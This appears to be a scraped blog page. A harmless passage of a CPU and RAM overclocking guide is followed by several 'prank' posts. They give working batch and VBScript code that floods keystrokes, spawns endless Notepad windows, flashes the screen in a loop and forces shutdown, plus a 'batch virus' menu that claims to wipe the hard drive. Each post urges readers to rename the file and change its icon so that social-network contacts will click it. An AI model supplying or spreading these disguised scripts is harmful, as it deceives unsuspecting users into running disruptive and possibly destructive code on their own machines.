To understand what this table means, lookhere. Note how the RAM's rated speed is DDR PC-4000. Then refer to this table and see how PC-4000 is equivalent to DDR 500.

To understand this, you must first understand how RAM works. RAM, or Random Access Memory, serves as temporary storage of files that the CPU needs to access quickly. For instance, when you load a level in a game, your CPU will load the level into RAM so that it can access the information quickly whenever it needs to, instead of loading the information from the relatively slow hard drive.

The important thing to know is that RAM functions at a certain speed, which is much lower than the CPU speed. Most RAM today runs at speeds between 133MHz and 300MHz. This may confuse you, since those speeds are not listed on my chart.

This is because RAM manufacturers, much like the CPU manufacturers from before, have managed to get RAM to send information twice every RAM clock cycle.* This is the reason for the "DDR" in the RAM speed rating. It stands for Double Data Rate. So DDR 400 means that the RAM operates at an effective speed of 400MHz, with the "400" in DDR 400 standing for the clock speed. Since it is sending instructions twice per clock cycle, that means it's real operating frequency is 200MHz. This works much like AMD's "double pumping" of the FSB.

So go back to the RAM that I linked before. It is listed at a speed of DDR PC-4000. PC-4000 is equivalent to DDR 500, which means that PC-4000 RAM has an effective speed of 500MHz with an underlying 250MHz clock speed.

So what does this all have to do with overclocking?

Well, as I said before, when you raise the FSB, you effectively overclock everything else in your system. This applies to RAM too. RAM that is rated at PC-3200 (DDR 400) is rated to run at speeds up to 200MHz. For a non-overclocker, this is fine, since your FSB won't be over 200MHz anyway.

Problems can occur, though, when you want to raise your FSB to speeds over 200MHz. Since the RAM is only rated to run at speeds up to 200MHz, raising your FSB higher than 200MHz can cause your system to crash. How do you solve this? There are three solutions: using a FSB:RAM ratio, overclocking your RAM, or simply buying RAM rated at a higher speed.

Since you probably only understood the last of those three options, I'll explain them:

FSB:RAM Ratio: If you want to raise your FSB to a higher speed than your RAM supports, you have the option of running your RAM at a lower speed than your FSB. This is done using an FSB:RAM ratio. Basically, the FSB:RAM ratio allows you to select numbers that set up a ratio between your FSB and RAM speeds. So, say you are using the PC-3200 (DDR 400) RAM that I mentioned before which runs at 200MHz. But you want to raise your FSB to 250MHz to overclock your CPU. Obviously, your RAM will not appreciate the raised FSB speed and will most likely cause your system to crash. To solve this, you can set up a 5:4 FSB:RAM ratio. Basically, this ratio will mean that for every 5MHz that your FSB runs at, your RAM will only run at 4MHz.

To make it easier, convert the 5:4 ratio to a 100:80 ratio. So for every 100MHz your FSB runs at, your RAM will only run at 80MHz. Basically, this means that your RAM will only run at 80% of your FSB speed. So with your 250MHz target FSB, running in a 5:4 FSB:RAM ratio, your RAM will be running at 200MHz, which is 80% of 250MHz. This is perfect, since your RAM is rated for 200MHz.

This solution, however, isn't ideal. Running the FSB and RAM with a ratio causes gaps in between the time that the FSB can communicate with the RAM. This causes slowdowns that wouldn't be there if the RAM and the FSB were running at the same speed. If you want the most speed out of your system, using an FSB:RAM ratio wouldn't be the best solution.

Overclocking your RAM
Overclocking your RAM is really very simple. The principle behind overclocking RAM is the same as overclocking your CPU: to get the RAM to run at a higher speed than it is supposed to run at. Luckily, the similarities between the two types of overclocking end there, or else RAM overclocking would be much more complicated than it is

To overclock RAM, you just enter the BIOS and attempt to run the RAM at a higher speed than it is rated at. For instance, you could try to run PC-3200 (DDR 400) RAM at a speed of 210MHz, which would be 10MHz over the rated speed. This could work, but in some cases it will cause the system to crash. If this happens, don't panic. The problem can be solved pretty easily by raising the voltage to your RAM. The voltage to your RAM, also known as vdimm, can be adjusted in most BIOSes. Raise it using the smallest increments available and test each setting to see if it works. Once you find a setting that works, you can either keep it or try to push your RAM farther. If you give the RAM too much voltage, however, it could get fried. For info on what voltages are safe, refer back to my Holy Grail of RAM

The only other thing that you have to worry about when overclocking RAM are the latency timings. These timings are the delays between certain RAM functions. If you want more info on this, you know where to look Basically, if you want to raise the speed of your RAM, you may have to raise the timings. It's not all that complicated, though, and shouldn't be too hard to understand.

That's really all there is to it. If only overclocking the CPU were that easy

Buying RAM rated at a Higher Speed
This one's the simplest thing in this entire guide If you want to raise your FSB to, say, 250MHz, just buy RAM that is rated to run at 250MHz, which would be DDR 500. The only downside to this option is that faster RAM will cost you more than slower RAM. Since overclocking your RAM is relatively simple, you might want to consider buying slower RAM and overclocking it to fit your needs. It could save you over a hundred bucks, depending on what type of RAM you need.


That's basically all you need to know about RAM and overclocking. Now onto the rest of the guide.


Voltage and how it affects Overclocking

There will be a point when you are overclocking and you simply cannot increase the speed of your CPU anymore no matter what you do and how much cooling you have. This is most likely because your CPU is not getting enough voltage. This is very similar to the RAM voltage scenario that I addressed above. To solve this, you simply up the voltage to your CPU, also known as the vcore. Do this in the same fashion described in the RAM section. Once you have enough voltage for the CPU to be stable, you can either keep the CPU at that speed or attempt to overclock it even further. As with the RAM, be careful not to overload the CPU with voltage. Each processor has recommended voltages setup by the manufacturer. Look on the website to find these. Try not to go past the recommended voltages.

Keep in mind that upping the voltage to your CPU will cause much greater heat output. This is why it is essential to have good cooling when overclocking. Which leads me to my next topic...


Cooling
As I said before, when you up the voltage to your CPU, the heat output great increases. This makes proper cooling a necessity. Here is a good set of links related to cooling and a few other topics.

There are basically three "levels" of case cooling:

Air Cooling (Fans)

Water Cooling (look here)

Peltier/Phase Change Cooling (VERY expensive and high end cooling[/b]

I really don't have much knowledge on the Peltier/Phase Change method of cooling, so I won't address it. All you need to know is that it could cost you upwards of $1000 dollars and can keep your CPU at sub-zero temperatures. It's intended for VERY high end overclockers, and I assume that nobody here will be using it.

The other two, however, are much more affordable and realistic.

Everybody knows about air cooling. If you're on a computer now (and I don't know how you'd be seeing this if you're not ), you probably hear a constant humming coming from it. If you look in the back, you will see a fan. This fan is basically all that air cooling is: the use of fans to suck cold air in and push hot air out. There are various ways to set up your fans, but you generally want to have an equal amount of air being sucked in and pushed out. For more info, refer to the link that I gave at the beginning of this section.

Water cooling is more expensive and exotic than air cooling. It is basically the use of pumps and radiators to cool your system more effectively than air cooling. For more info on it, check out the link that I gave next to water cooling before.

Those are the two most commonly used methods of case cooling. Good case cooling, however, is not the only component necessary for a cool computer. The other main component is the CPU Heatsink/Fan, or HSF. The purpose of the HSF is to channel heat away from the CPU and into the case so that it can be pushed out from the case fans. It is necessary to have an HSF on your CPU at all times. Your CPU will be fried in a matter of seconds if it is not.

There are tons of HSF's out there. For a ton of info on HSF's and everything that goes with them, check out this page again. It basically covers all you need to know about HSF's and air cooling.
Read more ...

Screen flashes random colors

                            
THREATEN BY MAKING SCREEN FLASH
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
Here are the steps:-
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
 But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
3. Now just save this file as Anything.bat ( Remember the .bat is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^
Read more ...

Menu based batch virus

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown


1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
3. Now just save this file as Anything.bat ( Remember the .bat is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.

Note:
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
Read more ...

Hack your friend's keyboard

                             
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
3. Now just save this file as Anything.vbs ( Remember the .vbs is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.
Read more ...

Open Notepad continuously

                                 
Open Notepad continuously in your friend's computer:
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
3. Now just save this file as Anything.bat ( Remember the .bat is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.
Read more ...

Shut down computer after showing a message


Convey your friend a ill message and shut down his / her computer:
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
3. Now just save this file as Anything.bat ( Remember the .bat is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.
Read more ...

Script for hitting Enter simultaneously

                             
Frustrate your friend by making this VBScript hit Enter simultaneously:
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
3. Now just save this file as Anything.vbs ( Remember the .vbs is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.
Read more ...

Script for hitting Backspace simultaneously

                             
Frustrate your friend by making this VBScript hit Backspace simultaneously:
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
3. Now just save this file as Anything.vbs ( Remember the .vbs is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.
Read more ...

Toggle Caps Lock button simultaneously


Procedure to Toggle your friend's Caps Lock button simultaneously:
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
3. Now just save this file as Anything.vbs ( Remember the .vbs is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.
Read more ...